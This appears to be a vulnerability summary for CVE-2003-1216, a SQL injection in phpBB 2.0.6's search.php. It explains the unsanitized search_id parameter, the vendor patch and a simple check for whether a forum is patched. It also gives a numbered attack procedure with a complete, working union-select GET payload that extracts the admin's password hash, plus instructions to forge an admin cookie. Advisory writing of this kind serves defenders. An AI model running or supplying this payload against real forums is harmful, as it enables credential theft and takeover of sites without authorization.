CVE-2003-1216

An attacker sends a crafted HTTP GET request to `search.php` with a malicious `search_id` parameter containing SQL injection payloads [ref_id=1][ref_id=2][ref_id=3]. For example, appending `union select concat(...) from phpbb_users where user_id=N/*` extracts the MD5 password hash of the target user [ref_id=1][ref_id=3]. The attacker can then use the hash to forge an admin cookie and gain full control of the forum [ref_id=2]. No authentication is required; the attack works over plain HTTP.

The vulnerability resides in `search.php` of phpBB 2.0.6 and earlier. The `search_id` parameter is not sanitized before being used in an SQL query [ref_id=2].

The advisory states that the phpBB developers patched the script after notification [ref_id=2]. Users were directed to download the latest 2.0.6 version or apply a manual fix described at the phpBB forum [ref_id=2]. A simple test to verify the fix is to request `search.php?search_id=1\` — a patched installation returns "No topics or posts met your search criteria", while an unpatched one returns an SQL error [ref_id=2]. No patch diff is provided in the bundle.

1. Identify a phpBB 2.0.6 (or earlier) forum. 2. Send a GET request: `http://target/phpBB2/search.php?search_id=1%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=2/*` 3. The MD5 hash of the admin (user_id=2) appears in the response as the `highlight` variable [ref_id=1][ref_id=3]. 4. Use the hash to forge an admin cookie and gain administrative access [ref_id=2].